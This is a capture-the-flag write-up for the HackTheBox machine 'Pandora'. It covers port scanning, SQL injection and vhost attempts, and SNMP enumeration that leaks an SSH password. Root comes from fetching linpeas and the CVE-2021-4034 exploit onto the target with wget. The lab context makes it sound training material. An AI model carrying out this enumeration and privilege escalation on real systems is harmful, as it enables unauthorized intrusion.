Pandora
An easy Linux box from HackTheBox, enumerating SNMP for initial access, then using a kernel exploit for root.
Recon
All port nmap scan to start, make a coffee
nmap -sV -sC -p- -oA nmap/pandora 10.10.11.136
Nmap scan report for 10.10.11.136
Host is up (0.035s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Didn’t find anything, just a web server
Navigating to it, find a contact form, and some mention of another app called Play
Try to see if the contact form is sql injectable after saving the request sent when submitting the form with burp
sqlmap -r contact.req
Unfortunately, none of the parameters are injectable
Also tried to enumerate vhosts with gobuster
gobuster vhost --follow-redirect -u http://panda.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million
-20000.txt -o ~/Documents/htb/pandora/gobuster/pandora.vhost
But didn’t find anything, absolutely stumped, guess I’ll go back to nmap
Lets try enumerating UDP services
sudo nmap -sU 10.10.11.136
We find that there is a snmp service (Simple Network Monitoring Protocol) running on port 161 with UDP, finally
Now can use snmpenum to enumerate whatever is going on with that port, public is the community, and linux.txt is the config file to access (don’t need to make it yourself, it’s just linux.txt)
snmpenum 10.10.11.136 public linux.txt
The output leaks a username, daniel
sshd: daniel [priv]
sshd: daniel@pts/1
The output is long and formatted badly, so use snmpwalk to enumerate it better
snmpwalk -c public -v2c -On 10.10.11.136 > pandora.walk
Its a yuge dump, so grepping through it to find high-entropy strings, things like “-u” and “-p” for logins, ssh commands etc, end up finding daniel’s password
.1.3.6.1.2.1.25.4.2.1.5.1118 = STRING: "-u daniel -p HotelBabylon23"
.1.3.6.1.2.1.25.4.2.1.5.19258 = STRING: "-k start"
.1.3.6.1.2.1.25.4.2.1.5.19283 = STRING: "-u daniel -p HotelBabylon23"
With which we can ssh in with
Exploitation
After ssh’ing in with the creds, run a python server and deliver linpeas.sh into the /tmp directory, and run it
The box is exploitable with CVE-2021-4034
git clone into host, then wget the folder as the target, run it to get root